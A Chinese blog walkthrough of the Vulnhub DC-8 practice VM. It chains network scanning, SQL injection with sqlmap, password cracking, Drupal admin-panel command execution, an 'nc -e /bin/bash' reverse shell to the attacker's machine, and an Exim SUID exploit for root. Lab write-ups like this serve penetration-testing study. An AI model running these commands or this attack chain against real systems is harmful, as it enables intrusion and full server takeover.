[Vulnhub] DC-8靶机渗透

最新推荐文章于 2024-07-26 16:34:21 发布
最新推荐文章于 2024-07-26 16:34:21 发布
阅读量198 收藏
点赞数
分类专栏: 靶场笔记 文章标签: 靶机 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119562208
版权

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-8,367/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述

0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现开启了80端口(HTTP服务)和22端口(SSH服务)

0x02 web渗透

访问80端口,又发现是一个 Drupal 搭建的站:
在这里插入图片描述
xray 扫出个注入:
在这里插入图片描述
丢导sqlmap跑出用户信息:
在这里插入图片描述
john命令破解出john用户的密码:
在这里插入图片描述
登录web后台:
在这里插入图片描述

0x03 RCE反弹shell

后台修改页面发现可以执行命令:
在这里插入图片描述
命令执行成功:
在这里插入图片描述
攻击机监听,构造payload反弹shell:nc -e /bin/bash 192.168.0.110 4444
在这里插入图片描述

0x04 exim4命令提权

查看版本信息:
在这里插入图片描述
查找设置了SUID的文件:find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
查看exim版本信息:
在这里插入图片描述
exim命令在使用时具有root权限,查找相关exp:
在这里插入图片描述
将exp上传导靶机:
在这里插入图片描述
赋予执行权限,执行报错:
在这里插入图片描述
查询得知是因为这个shell是在windows下编写的,所以换行格式与Linux不同,运行后无法解析,要将46996.sh文件转换成unix下可执行文件即可正常运行:

vim 46996.sh
:set ff? # 可以看到 dos 或 unix 的字样
:set ff=unix # 强化之转为unix格式,然后存盘输出

在攻击机处理好脚本文件重新上传导靶机并赋予可执行权限,执行:./46996.sh -m natcat
在这里插入图片描述
在根目录找到flag:
在这里插入图片描述

总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => sql注入拿到用户信息 => john破解密码 => 后台RCE反弹shell => 查找设置SUID文件 => 收集版本信息 => 找对应exp提权 => 找到flag

linux 里面有个 suid 权限执行二进制文件,这个权限涉及的命令权限都很大。在找对应exp提权时,版本信息收集一定要全面

yAnd0n9
关注
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1951
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
VulnHubDC-8
weixin_39219503的博客
02-02 427
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
DC-8靶机渗透
m0_62008601的博客
06-05 1054
dc-8靶机详细渗透过程
DC-8靶机教程
qq_40863723的博客
02-17 1728
多喝热水:http://hackergu.com/ 一、主机发现 ​ 使用netdiscover,发现主机IP为192.168.203.134。 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST ...
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4723
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
vulnhub靶场 DC-1靶机 渗透详细过程
最新发布
黑战士的博客
07-26 1118
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1443
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1992
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 713
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub渗透测试靶机DC-8
weixin_46128614的博客
01-19 801
靶机下载: https://www.vulnhub.com/entry/dc-8,367/ 环境: kali:192.168.49.129 靶机:192.168.49.12 先arp扫描一下目标靶机的ip地址 发现192.168.49.12 nmap流程走一下 nmap 192.168.49.12 -p- -sV -sT -T5 -A 只开放了22和80 浏览器打开,发现是一个用Drupal搭...
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3061
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
Pikachu靶场通关笔记
weixin_45605352的博客
03-27 1万+
一. Burte Force(暴力破解) “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的
DVWA靶场通关笔记
weixin_45605352的博客
03-17 4112
文章目录Brute Force 暴力破解LowMediumHighImpossible防护总结:Command Injection 命令注入危害:LowMediumHighImpossible防护总结:CSRF 跨站请求伪造危害:LowMediumHighImpossible防护总结:File Inclusion 文件包含危害:LowMediumHighimpossible防护总结:File Upload 文件上传危害:LowMediumHighImpossible补充常见解析漏洞:防护总结:Insecur
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 816
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
[Vulnhub] PWNLAB-init Linux利用环境变量提权
weixin_45605352的博客
05-18 580
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 下载之后用vmware打开即可,这里使用的是桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开放了80端口(HTTP服务)和3306端口(MySQL服务)。 0x02 web渗透 访问80端口,没有发现什么可以利用的点: 用nikto扫描,发现了config.php,里面可能
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 476
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值